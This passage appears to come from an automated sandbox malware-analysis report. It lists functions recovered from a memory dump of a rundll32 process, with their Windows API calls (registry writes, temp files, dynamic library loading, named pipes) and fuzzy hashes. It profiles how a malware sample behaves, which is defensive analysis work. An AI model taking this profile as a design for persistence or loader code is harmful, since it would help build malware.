                              • StrTrimA.SHLWAPI(00000001,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0593C058
                              • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0593C063
                              • StrTrimA.SHLWAPI(00000001,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0593C07C
                              • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 0593C11F
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0593C141
                              • lstrcpy.KERNEL32(00000020,?), ref: 0593C160
                              • lstrlen.KERNEL32(?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 0593C16A
                              • memcpy.NTDLL(?,?,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0593C1AB
                              • memcpy.NTDLL(?,?,?,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 0593C1BE
                              • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057), ref: 0593C1E2
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,059485F1,?,00000000,0000001E), ref: 0593C201
                              • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?), ref: 0593C227
                              • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?), ref: 0593C243
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                              • String ID:
                              • API String ID: 3323474148-0
                              • Opcode ID: 64cc7742204ba5dc1a61e5abff24c1a7b040b1f3d75b84e913e36f7529c77bb3
                              • Instruction ID: 76a276a64a822fb7a1d48cbc898f06ca6647798a40898a57ce8f9b78957dbd9d
                              • Opcode Fuzzy Hash: 64cc7742204ba5dc1a61e5abff24c1a7b040b1f3d75b84e913e36f7529c77bb3
                              • Instruction Fuzzy Hash: 58716972108741EFDB21DF64C846A5ABBE8FF48314F044A2DF59AE3250DB31E954CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059405BC Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000), ref: 059405D3
                              • lstrlen.KERNEL32(?,?,00000000), ref: 059405DA
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059405F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 05940602
                              • lstrcat.KERNEL32(?,?), ref: 0594061E
                              • lstrcat.KERNEL32(?,?), ref: 0594062F
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05940640
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059406DD
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 05940716
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0594072F
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 05940739
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05940749
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05940762
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05940772
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                              • String ID:
                              • API String ID: 333890978-0
                              • Opcode ID: e758ae5206b9411ef0574b9f9891bf45a91eb574578e773628e5a716b7dd4fdc
                              • Instruction ID: 1591bd14413fe41ee0743abaece5cc24cf68e296908fa003537c331076c5001d
                              • Opcode Fuzzy Hash: e758ae5206b9411ef0574b9f9891bf45a91eb574578e773628e5a716b7dd4fdc
                              • Instruction Fuzzy Hash: 8B517A76814209FFDB019FA4DC89CAEBFBDFB49250B054425FA0A9B110DB319E55DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594AFC2 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,?,0593663D,?,?), ref: 0594AFCF
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0593663D,?,?), ref: 0594AFF8
                              • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0594B018
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 0594B034
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B040
                              • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0593663D,?,?), ref: 0594B043
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B04F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B06C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B086
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B09C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B0B2
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B0C8
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B0DE
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,0593663D,?,?), ref: 0594B107
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                              • String ID:
                              • API String ID: 3772355505-0
                              • Opcode ID: 2c269be0c745ec28b3bff89b9d517f9deb7535b51f2a7b328ad67cc2bf67433b
                              • Instruction ID: e59755dbc3ff74024791f88b61afab462afc34ad1a693be452a3b25933f7fdeb
                              • Opcode Fuzzy Hash: 2c269be0c745ec28b3bff89b9d517f9deb7535b51f2a7b328ad67cc2bf67433b
                              • Instruction Fuzzy Hash: 6B3135B161830BAFDB109F64DD85D66BBECEF08255B014526F909C7252EB78EC24CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D016 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D02D
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D038
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D040
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593D055
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0593D066
                              • lstrcatW.KERNEL32(00000000,?), ref: 0593D078
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D07D
                              • lstrcatW.KERNEL32(00000000,059553E0), ref: 0593D089
                              • lstrcatW.KERNEL32(00000000), ref: 0593D092
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D097
                              • lstrcatW.KERNEL32(00000000,059553E0), ref: 0593D0A3
                              • lstrcatW.KERNEL32(00000000,00000002), ref: 0593D0BF
                              • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D0C7
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D0D5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                              • String ID:
                              • API String ID: 3635185113-0
                              • Opcode ID: dee9a43cca79b044ef6a08b4a78ac267c80248c3150465ad492f980c451ee8ee
                              • Instruction ID: 108ff9b6e4c762998b819b355eba296cf9ee75f1ff512cf05dffc94c24883641
                              • Opcode Fuzzy Hash: dee9a43cca79b044ef6a08b4a78ac267c80248c3150465ad492f980c451ee8ee
                              • Instruction Fuzzy Hash: 7321CF32218305EFD3216F24DC86E7FFFACEF85A91F020519F90992112DF6098269BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E19A Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05937A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05937AA6
                                • Part of subcall function 05937A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05937ABE
                                • Part of subcall function 05937A61: WaitForSingleObject.KERNEL32(00000000,?,059487CC,?,?), ref: 05937B86
                                • Part of subcall function 05937A61: HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BAF
                                • Part of subcall function 05937A61: HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BBF
                                • Part of subcall function 05937A61: RegCloseKey.ADVAPI32(?,?,059487CC,?,?), ref: 05937BC8
                              • lstrcmp.KERNEL32(?,00000000), ref: 0594E211
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0593399C,00000000,00000000), ref: 0594E23D
                              • GetCurrentThreadId.KERNEL32 ref: 0594E2EE
                              • GetCurrentThread.KERNEL32 ref: 0594E2FF
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,0593399C,00000001,76CDF730,00000000,00000000), ref: 0594E33C
                              • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,0593399C,00000001,76CDF730,00000000,00000000), ref: 0594E350
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0594E35E
                              • wsprintfA.USER32 ref: 0594E376
                                • Part of subcall function 05933263: lstrlen.KERNEL32(?,00000000,05953716,00000000,05942466,?,?,?,05948A07,?,?,?,00000000,00000001,00000000,?), ref: 0593326D
                                • Part of subcall function 05933263: lstrcpy.KERNEL32(00000000,?), ref: 05933291
                                • Part of subcall function 05933263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05948A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05933298
                                • Part of subcall function 05933263: lstrcat.KERNEL32(00000000,?), ref: 059332EF
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0594E381
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0594E398
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594E3A9
                              • HeapFree.KERNEL32(00000000,?), ref: 0594E3B5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                              • String ID:
                              • API String ID: 773763258-0
                              • Opcode ID: e593e81cf87251dbeeb969f68cb7d4bd9131d8f68ce0b2e04680b4dea87dc692
                              • Instruction ID: a664ea9978900e7ff6cb83e1cb56f2bd6b5c54bf93bc4a7167fbfc0486214284
                              • Opcode Fuzzy Hash: e593e81cf87251dbeeb969f68cb7d4bd9131d8f68ce0b2e04680b4dea87dc692
                              • Instruction Fuzzy Hash: 32712171914219EFCB12DFA4D889EAEBFB9FF09311F048125F605A7220DB30AA55DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059351FF Relevance: 18.2, APIs: 12, Instructions: 186synchronizationstringthreadCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05935226
                              • memcpy.NTDLL(?,?,00000010), ref: 05935249
                              • memset.NTDLL ref: 05935295
                              • lstrcpyn.KERNEL32(?,?,00000034), ref: 059352A9
                              • GetLastError.KERNEL32 ref: 059352D7
                              • GetLastError.KERNEL32 ref: 0593531E
                              • GetLastError.KERNEL32 ref: 0593533D
                              • WaitForSingleObject.KERNEL32(?,000927C0), ref: 05935377
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05935385
                              • GetLastError.KERNEL32 ref: 05935408
                              • ReleaseMutex.KERNEL32(?), ref: 0593541A
                              • RtlExitUserThread.NTDLL(?), ref: 05935430
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                              • String ID:
                              • API String ID: 4037736292-0
                              • Opcode ID: 8da0e8b0a3eb6bc2115f2880f14c885479580addbd49ad13cfa0fb8ca664a3ce
                              • Instruction ID: 3e8174789292fd8f7e3c4f10d09acf6dd24792f7e92b3cb6bed43337b0ddc1d0
                              • Opcode Fuzzy Hash: 8da0e8b0a3eb6bc2115f2880f14c885479580addbd49ad13cfa0fb8ca664a3ce
                              • Instruction Fuzzy Hash: 75618C71518700EFD7119F25D84AA6BBBEDFF88721F018A29F596D2180EBB0E914CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D9F6 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0593DA0C
                              • lstrlen.KERNEL32(?), ref: 0593DA14
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593DA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593DA43
                              • lstrlen.KERNEL32(?), ref: 0593DA58
                              • lstrlen.KERNEL32(?), ref: 0593DA66
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0593DAB4
                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0593DAD8
                              • lstrlen.KERNEL32(?), ref: 0593DB0B
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0593DB36
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0593DB4D
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0593DB5A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                              • String ID:
                              • API String ID: 904523553-0
                              • Opcode ID: 607409ad76adfa6a773a9094df36b77d91fc24189aa18cc5a31176ec71cbe06b
                              • Instruction ID: fd17b7d5bcb0c1bf9af1f900315927b9b3ae6d4eef4c45e3598a729c9c5079e9
                              • Opcode Fuzzy Hash: 607409ad76adfa6a773a9094df36b77d91fc24189aa18cc5a31176ec71cbe06b
                              • Instruction Fuzzy Hash: 0F41687190434AEFCF128FA4CC56EAEBFBAFB45390F148065F81597150DB30A925DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05941FE9 Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0594201B
                              • WaitForSingleObject.KERNEL32(00000330,00000000), ref: 0594203D
                              • ConnectNamedPipe.KERNEL32(?,?), ref: 0594205D
                              • GetLastError.KERNEL32 ref: 05942067
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0594208B
                              • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 059420CE
                              • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 059420D7
                              • WaitForSingleObject.KERNEL32(00000000), ref: 059420E0
                              • CloseHandle.KERNEL32(?), ref: 059420F5
                              • GetLastError.KERNEL32 ref: 05942102
                              • CloseHandle.KERNEL32(?), ref: 0594210F
                              • RtlExitUserThread.NTDLL(000000FF), ref: 05942125
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                              • String ID:
                              • API String ID: 4053378866-0
                              • Opcode ID: 3919d21899beb85eb7d3271281083e03d8f4a284b875957ed6a60c3a20363395
                              • Instruction ID: 34eb871415a9ae3885ad234c61e4e66049fc21ba0064f4903a8f223095a04fbd
                              • Opcode Fuzzy Hash: 3919d21899beb85eb7d3271281083e03d8f4a284b875957ed6a60c3a20363395
                              • Instruction Fuzzy Hash: 61317A74418305AFEB109F34C889D6FBFA9FF48324F114A29F966921A0DB709D55CF92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944140 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(?), ref: 05944151
                              • GetTempPathA.KERNEL32(00000000,00000000,?,?,059409CF,00000094,00000000,00000000,?), ref: 05944169
                              • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05944178
                              • GetTempPathA.KERNEL32(00000001,00000000,?,?,059409CF,00000094,00000000,00000000,?), ref: 0594418B
                              • GetTickCount.KERNEL32 ref: 0594418F
                              • wsprintfA.USER32 ref: 059441A6
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059441E1
                              • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 05944201
                              • lstrlen.KERNEL32(00000000), ref: 0594420B
                              • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0594421B
                              • RegCloseKey.ADVAPI32(?), ref: 05944227
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 05944235
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                              • String ID:
                              • API String ID: 3778301466-0
                              • Opcode ID: cec337bd382cd89854ceadb984c04e83876118ec661b9328d5fea804078d5094
                              • Instruction ID: a5ac3a0df9ffa5394f50c5084db5fa37aa8653acbe45a870b489a24e1aa0996c
                              • Opcode Fuzzy Hash: cec337bd382cd89854ceadb984c04e83876118ec661b9328d5fea804078d5094
                              • Instruction Fuzzy Hash: BA3146B1414219FFEB109FA0EC89EAFBFACEB45295B014025F90AC7100DB349E65DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05935093 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 059350BD
                              • GetCurrentThreadId.KERNEL32 ref: 059350D3
                              • GetCurrentThread.KERNEL32 ref: 059350E4
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                                • Part of subcall function 05950551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0593512E,00000020,00000000,?,00000000), ref: 059505BC
                                • Part of subcall function 05950551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0593512E,00000020,00000000,?,00000000), ref: 059505E4
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0593515E
                              • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0593516A
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 059351B9
                              • wsprintfA.USER32 ref: 059351D1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 059351DC
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 059351F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                              • String ID: W
                              • API String ID: 630447368-655174618
                              • Opcode ID: e1d1ee48597dd246bcfc3705551fce1ef27c72221453ced1df739fd852f6234d
                              • Instruction ID: 0eef5071ea9e861220962ba9be9633af6ae0f0c7fca5d56b90cb543e24601f61
                              • Opcode Fuzzy Hash: e1d1ee48597dd246bcfc3705551fce1ef27c72221453ced1df739fd852f6234d
                              • Instruction Fuzzy Hash: C6417A70A14218FFDF12AFA1DD4ADAEBFB9FF49750B054025F90996110EB30DA64DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594B804 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0594B82F
                                • Part of subcall function 0594447B: RegCloseKey.ADVAPI32(?,?), ref: 05944502
                              • RegOpenKeyA.ADVAPI32(80000001,05944833,?), ref: 0594B86A
                              • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 0594B8CC
                              • lstrcatW.KERNEL32(00000000,?), ref: 0594B8E1
                              • lstrcpyW.KERNEL32(?), ref: 0594B8FB
                              • lstrcatW.KERNEL32(00000000,?), ref: 0594B90A
                                • Part of subcall function 0594452B: lstrlenW.KERNEL32(?,?,?,0593E51D,?,?,?,?,00001000,?,?,00001000), ref: 0594453E
                                • Part of subcall function 0594452B: lstrlen.KERNEL32(?,?,0593E51D,?,?,?,?,00001000,?,?,00001000), ref: 05944549
                                • Part of subcall function 0594452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0594455E
                              • RegCloseKey.ADVAPI32(05944833,?,?,05944833), ref: 0594B974
                                • Part of subcall function 0593C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0593171E,?,?,00000000,?), ref: 0593C2B6
                                • Part of subcall function 0593C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0593171E,?,?,00000000,?), ref: 0593C2DE
                                • Part of subcall function 0593C2AA: memset.NTDLL ref: 0593C2F0
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,05944833), ref: 0594B9A9
                              • GetLastError.KERNEL32(?,?,05944833), ref: 0594B9B4
                              • HeapFree.KERNEL32(00000000,00000000,?,?,05944833), ref: 0594B9CA
                              • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,05944833), ref: 0594B9DC
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                              • String ID:
                              • API String ID: 1430934453-0
                              • Opcode ID: 6d50b1ace35f5de6881f1c4e50cdd7924fdaaa0c8836e234e198d045122c0d15
                              • Instruction ID: 3500d13eace5ad50583fec155def1fa7dc7ed96488e3253863d0ac3017da329a
                              • Opcode Fuzzy Hash: 6d50b1ace35f5de6881f1c4e50cdd7924fdaaa0c8836e234e198d045122c0d15
                              • Instruction Fuzzy Hash: BE513872914209EBDF11DBA0DC45EAEBBBEFF44248B100565F905A3150EB35EE21DFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945353 Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05945389
                              • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0594539E
                              • RegCreateKeyA.ADVAPI32(80000001,?), ref: 059453C6
                              • HeapFree.KERNEL32(00000000,?), ref: 05945407
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05945417
                              • RtlAllocateHeap.NTDLL(00000000,0593DA9D), ref: 0594542A
                              • RtlAllocateHeap.NTDLL(00000000,0593DA9D), ref: 05945439
                              • HeapFree.KERNEL32(00000000,00000000,?,0593DA9D,00000000,?,?,?), ref: 05945483
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0593DA9D,00000000,?,?,?,?), ref: 059454A7
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0593DA9D,00000000,?,?,?), ref: 059454CC
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0593DA9D,00000000,?,?,?), ref: 059454E1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Allocate$CloseCreate
                              • String ID:
                              • API String ID: 4126010716-0
                              • Opcode ID: c439cbd9d3bb17c152586d682d64b40fb794727dd78b635146005a87f919dfbd
                              • Instruction ID: e0c364b8eb69391892e3171cf49c7dcd51a2799872014ee2fbc0552d3d342196
                              • Opcode Fuzzy Hash: c439cbd9d3bb17c152586d682d64b40fb794727dd78b635146005a87f919dfbd
                              • Instruction Fuzzy Hash: 3951CFB5814209EFDF019FE4D8858EEBFB9FB08355F11446AFA05A2120D7359EA4DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593CEC3 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • PathFindFileNameW.SHLWAPI(?), ref: 0593CEDD
                              • PathFindFileNameW.SHLWAPI(?), ref: 0593CEF3
                              • lstrlenW.KERNEL32(00000000), ref: 0593CF36
                              • RtlAllocateHeap.NTDLL(00000000,0595350B), ref: 0593CF4C
                              • memcpy.NTDLL(00000000,00000000,05953509), ref: 0593CF5F
                              • _wcsupr.NTDLL ref: 0593CF6B
                              • lstrlenW.KERNEL32(?,05953509), ref: 0593CFA4
                              • RtlAllocateHeap.NTDLL(00000000,?,05953509), ref: 0593CFB9
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0593CFCF
                              • lstrcatW.KERNEL32(00000000,?), ref: 0593CFF5
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593D004
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                              • String ID:
                              • API String ID: 3868788785-0
